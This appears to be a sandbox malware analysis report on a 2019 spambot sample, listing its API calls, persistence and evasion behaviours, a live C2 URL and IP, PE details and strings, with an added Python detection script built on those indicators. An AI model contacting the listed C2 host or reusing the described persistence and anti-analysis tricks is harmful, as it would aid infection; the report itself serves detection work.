DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/CharUpperA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: wincfg32svc.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
Drops a binary and executes it
binary: C:\Windows\750547060050\wincfg32svc.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/attachment.js
suspicious_request: http://icanhazip.com/
Performs some HTTP requests
url: http://92.63.197.48/m/attachment.js
url: http://icanhazip.com/
Looks up the external IP address
domain: icanhazip.com
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: wincfg32svc.exe (2688) called API NtClose 500152 times
Spam: 2019-01-08-spambot-malware.exe (2924) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
data: C:\Windows\750547060050\wincfg32svc.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
data: C:\Windows\750547060050\wincfg32svc.exe
Creates a hidden or system file
file: C:\Windows\750547060050
file: C:\Windows\750547060050\wincfg32svc.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\750547060050\wincfg32svc.exe
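The Signatures above give enough host and network indicators to write detection logic for this sample: the copy dropped into a numeric directory under C:\Windows, the WinCfgMgr Run value in both HKLM (Wow6432Node) and HKCU, the deleted Zone.Identifier stream, the request to http://92.63.197.48/m/attachment.js, the icanhazip.com lookup and the yahoo.com MX query. The script below is an added example, not CAPE output and not code from the sample. The events it runs over are constructed to mirror the report, not real telemetry; treating the 12-digit directory name as variable per infection, treating an MX lookup from an arbitrary process as a spambot indicator, and the verdict thresholds are all assumptions made here, not findings of the report.

```python
"""Detection logic for the behaviours in the Signatures section above.

Added example, not sandbox output and not code from the sample. SAMPLE_EVENTS
are constructed to mirror the report; they are not real endpoint telemetry.
"""
import re
from dataclasses import dataclass

# Indicators copied from the report's Signatures, Hosts and DNS sections.
RUN_VALUE_NAME = "WinCfgMgr"
C2_URLS = {"http://92.63.197.48/m/attachment.js"}
EXTERNAL_IP_SERVICES = {"icanhazip.com"}

# ASSUMPTION: the 12-digit directory (750547060050 in this run) is treated as
# variable per infection, so any 12-digit directory under C:\Windows matches.
DROP_PATH_RE = re.compile(r"^[a-z]:\\windows\\\d{12}\\wincfg32svc\.exe$", re.IGNORECASE)
# Both Run keys the sample wrote (HKLM Wow6432Node and HKCU), value name WinCfgMgr.
RUN_KEY_RE = re.compile(
    r"^HKEY_(?:LOCAL_MACHINE|CURRENT_USER)\\Software\\(?:Wow6432Node\\)?"
    r"Microsoft\\Windows\\CurrentVersion\\Run\\" + RUN_VALUE_NAME + r"$",
    re.IGNORECASE,
)
ZONE_ID_RE = re.compile(r":Zone\.Identifier$", re.IGNORECASE)


@dataclass(frozen=True)
class Event:
    kind: str       # file_create | file_delete | reg_set | http | dns
    process: str
    target: str     # path, registry value, URL or queried name
    data: str = ""  # registry data, or DNS record type for dns events


def classify(ev):
    """Return the name of the rule an event trips, or None."""
    if ev.kind == "file_create" and DROP_PATH_RE.match(ev.target):
        return "drop_wincfg32svc"
    if ev.kind == "reg_set" and RUN_KEY_RE.match(ev.target) and DROP_PATH_RE.match(ev.data):
        return "autorun_WinCfgMgr"
    if ev.kind == "file_delete" and ZONE_ID_RE.search(ev.target):
        return "motw_stream_deleted"
    if ev.kind == "http" and ev.target in C2_URLS:
        return "c2_attachment_js"
    if ev.kind == "dns" and ev.target.lower() in EXTERNAL_IP_SERVICES:
        return "external_ip_lookup"
    # ASSUMPTION: an MX lookup from an arbitrary process (the yahoo.com MX
    # query in the DNS section) is treated as a spambot indicator.
    if ev.kind == "dns" and ev.data.upper() == "MX":
        return "mx_lookup_spambot"
    return None


def detect(events):
    """Return (rule, event) pairs for every event that trips a rule."""
    return [(rule, ev) for ev in events if (rule := classify(ev))]


def verdict(events, malicious_at=3):
    """ASSUMPTION: thresholds are illustrative and unrelated to CAPE's MalScore."""
    rules = {rule for rule, _ in detect(events)}
    if len(rules) >= malicious_at:
        return "malicious"
    return "suspicious" if rules else "clean"


# Constructed events mirroring the report, plus two benign ones as noise.
DROP = r"C:\Windows\750547060050\wincfg32svc.exe"
SAMPLE_EVENTS = [
    Event("file_create", "2019-01-08-spambot-malware.exe", DROP),
    Event("reg_set", "2019-01-08-spambot-malware.exe",
          r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr", DROP),
    Event("file_delete", "2019-01-08-spambot-malware.exe",
          r"C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier"),
    Event("http", "wincfg32svc.exe", "http://92.63.197.48/m/attachment.js"),
    Event("dns", "wincfg32svc.exe", "icanhazip.com", "A"),
    Event("dns", "wincfg32svc.exe", "yahoo.com", "MX"),
    Event("reg_set", "explorer.exe",
          r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
          r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    Event("file_create", "notepad.exe", r"C:\Users\user\notes.txt"),
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule:22} {ev.process:32} {ev.target}")
    print("verdict:", verdict(SAMPLE_EVENTS))
```

The autorun rule deliberately requires both the WinCfgMgr value name and drop-path-shaped data, so an unrelated program that happens to use a Run value of the same name does not fire it; the drop-path rule on its own catches a renamed-but-same-layout variant under a different 12-digit directory.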

Hosts

Direct IP Country Name
N 98.136.101.117 [VT] United States
Y 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States
N 147.75.40.2 [VT] United States

DNS

Name                         Response                          Post-Analysis Lookup
yahoo.com [VT]               MX mta5.am0.yahoodns.net [VT]
                             MX mta7.am0.yahoodns.net [VT]
                             MX mta6.am0.yahoodns.net [VT]
mta5.am0.yahoodns.net [VT]   A 66.218.85.139 [VT]
                             A 74.6.137.64 [VT]
                             A 98.136.101.117 [VT]
                             A 67.195.228.141 [VT]
                             A 67.195.229.59 [VT]
                             A 98.137.159.24 [VT]
                             A 98.137.159.28 [VT]
                             A 66.218.85.52 [VT]
icanhazip.com [VT]           A 147.75.40.2 [VT]

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
C:\Windows\750547060050\wincfg32svc.exe
C:\Windows\750547060050
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
C:\Windows\750547060050\msvcr100.dll
C:\Windows\750547060050\wincfg32svc.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
\Device\KsecDD
C:\Windows\750547060050\wincfg32svc.exe
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
C:\Windows\750547060050\wincfg32svc.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wincfg32svc_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.Module32FirstW
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll.wcslen
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.fscanf
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll.wcscmp
msvcrt.dll.fclose
msvcrt.dll._snwprintf
msvcrt.dll.atoi
msvcrt.dll.fgets
msvcrt.dll.strchr
msvcrt.dll.strcpy
msvcrt.dll.strcat
msvcrt.dll.strlen
msvcrt.dll.strstr
msvcrt.dll._snprintf
msvcrt.dll.memset
msvcrt.dll.malloc
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll.sprintf
msvcrt.dll._wfopen
msvcrt.dll.feof
msvcrt.dll.fprintf
ws2_32.dll.#115
ws2_32.dll.#19
ws2_32.dll.#3
ws2_32.dll.#52
ws2_32.dll.#9
ws2_32.dll.#23
ws2_32.dll.#4
ws2_32.dll.#11
ws2_32.dll.#16
wininet.dll.InternetOpenUrlA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFileExistsW
dnsapi.dll.DnsQuery_A
dnsapi.dll.DnsFree
kernel32.dll.lstrcpyA
kernel32.dll.Sleep
kernel32.dll.CreateThread
kernel32.dll.CreateProcessW
kernel32.dll.ExitThread
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.FileTimeToSystemTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.GetTickCount
kernel32.dll.DeleteFileW
kernel32.dll.SetFileAttributesW
kernel32.dll.GetLocalTime
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.ReadFile
kernel32.dll.SetFilePointer
kernel32.dll.WriteFile
kernel32.dll.lstrlenA
kernel32.dll.GetFileSize
kernel32.dll.CloseHandle
kernel32.dll.CreateFileW
kernel32.dll.GetSystemTime
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.CopyFileW
kernel32.dll.CreateDirectoryW
kernel32.dll.GetModuleFileNameW
kernel32.dll.ExpandEnvironmentStringsW
user32.dll.CharUpperA
user32.dll.wsprintfA
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
C:\Windows\750547060050\wincfg32svc.exe
5796979494
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x0040612b
Reported Checksum 0x0002a39c
Actual Checksum 0x0002a39c
Minimum OS Version 5.1
Compile Time 2018-06-12 09:38:39
Import Hash d35bcbd35d8412168d5b53bfa8e7da9d
Exported DLL Name \x8e\x01LookupPrivilegeNameA

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00013dae 0x00013e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.56
.rdata 0x00015000 0x0000429e 0x00004400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.26
.data 0x0001a000 0x0000d7c8 0x0000ae00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.31
.rsrc 0x00028000 0x00001ca0 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.02
.reloc 0x0002a000 0x00001cc2 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.69

Imports

Library KERNEL32.dll:
0x415028 TerminateProcess
0x41502c LCMapStringA
0x415030 GetLastError
0x415034 GetProcAddress
0x41503c SetCommMask
0x415044 VirtualProtect
0x41504c DuplicateHandle
0x415050 TerminateThread
0x415058 GetThreadTimes
0x41505c lstrcpyA
0x415064 CreateFileA
0x415068 GetLocaleInfoW
0x41506c LoadLibraryA
0x415070 LoadLibraryW
0x415074 GlobalAlloc
0x415078 EscapeCommFunction
0x41507c GetDriveTypeA
0x415080 GetModuleHandleW
0x415084 GetCommProperties
0x415088 GetCurrentProcess
0x415090 SetComputerNameExA
0x415094 CloseHandle
0x415098 ExitProcess
0x41509c FlushFileBuffers
0x4150a0 WriteConsoleW
0x4150a4 GetConsoleOutputCP
0x4150a8 WriteConsoleA
0x4150b4 Sleep
0x4150c8 HeapFree
0x4150d4 IsDebuggerPresent
0x4150d8 GetCommandLineA
0x4150dc GetStartupInfoA
0x4150e0 RtlUnwind
0x4150e4 RaiseException
0x4150e8 WideCharToMultiByte
0x4150ec MultiByteToWideChar
0x4150f0 LCMapStringW
0x4150f4 GetCPInfo
0x4150f8 HeapAlloc
0x4150fc HeapCreate
0x415100 VirtualFree
0x415104 VirtualAlloc
0x415108 HeapReAlloc
0x41510c TlsGetValue
0x415110 TlsAlloc
0x415114 TlsSetValue
0x415118 TlsFree
0x41511c SetLastError
0x415120 GetCurrentThreadId
0x415124 ReadFile
0x415128 WriteFile
0x41512c GetConsoleCP
0x415130 GetConsoleMode
0x415134 GetStdHandle
0x415138 GetModuleFileNameA
0x41514c SetHandleCount
0x415150 GetFileType
0x415158 GetTickCount
0x41515c GetCurrentProcessId
0x415164 HeapSize
0x415168 GetACP
0x41516c GetOEMCP
0x415170 IsValidCodePage
0x415174 GetUserDefaultLCID
0x415178 GetLocaleInfoA
0x41517c EnumSystemLocalesA
0x415180 IsValidLocale
0x415184 GetStringTypeA
0x415188 GetStringTypeW
0x415190 SetFilePointer
0x415194 SetStdHandle
Library USER32.dll:
0x4151a4 GetScrollRange
0x4151a8 GetPropW
0x4151ac PostMessageW
0x4151b0 GetFocus
0x4151b4 SetScrollRange
Library GDI32.dll:
0x41501c EndPath
0x415020 FillPath
Library ADVAPI32.dll:
0x415004 GetUserNameA
Library MSIMG32.dll:
0x41519c TransparentBlt
Library WINHTTP.dll:
0x4151bc WinHttpOpen
0x4151c0 WinHttpCloseHandle

Exports

Ordinal Address Name
.text
`.rdata
@.data
.rsrc
@.reloc
bad allocation
string too long
invalid string position
Unknown exception
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
(null)
CorExitProcess
runtime error
Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
bad exception
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
bad allocation
VirtualAlloc
Module32FirstW
zebazobupuyobumetelawefibudiwu
kernel
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
vector<T> too long
bad cast
ExitProcess
SetComputerNameExA
SetConsoleTextAttribute
GetCurrentProcess
GetCommProperties
GetModuleHandleW
EscapeCommFunction
GetDriveTypeA
GlobalAlloc
LoadLibraryW
TerminateThread
TerminateProcess
LCMapStringA
GetLastError
GetProcAddress
SetProcessWorkingSetSize
SetCommMask
GetProcessAffinityMask
VirtualProtect
CreateToolhelp32Snapshot
DuplicateHandle
CloseHandle
GetFileInformationByHandle
GetThreadTimes
lstrcpyA
LocalFileTimeToFileTime
KERNEL32.dll
GetPropW
GetScrollRange
SetScrollRange
GetFocus
PostMessageW
USER32.dll
FillPath
EndPath
GDI32.dll
SetSecurityDescriptorControl
LookupPrivilegeNameA
GetSecurityDescriptorControl
GetUserNameA
InitiateSystemShutdownW
GetSecurityDescriptorDacl
ADVAPI32.dll
TransparentBlt
MSIMG32.dll
WinHttpCloseHandle
WinHttpOpen
WINHTTP.dll
InterlockedIncrement
InterlockedDecrement
Sleep
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
HeapFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCommandLineA
GetStartupInfoA
RtlUnwind
RaiseException
WideCharToMultiByte
MultiByteToWideChar
LCMapStringW
GetCPInfo
HeapAlloc
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
ReadFile
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
GetACP
GetOEMCP
IsValidCodePage
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
GetStringTypeA
GetStringTypeW
InitializeCriticalSectionAndSpinCount
SetFilePointer
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
FlushFileBuffers
LoadLibraryA
GetLocaleInfoW
CreateFileA
.?AV_Locimp@locale@std@@
.?AVout_of_range@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$_Iosb@H@std@@
.?AVios_base@std@@
lagobaji
kaledeticegodacegudohakomojewe hogidipo
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVfailure@ios_base@std@@
.?AVlength_error@std@@
.?AVbad_cast@std@@
.?AVbad_alloc@std@@
KERNEL32.DLL
(null)
mscoree.dll
kernel32.dll
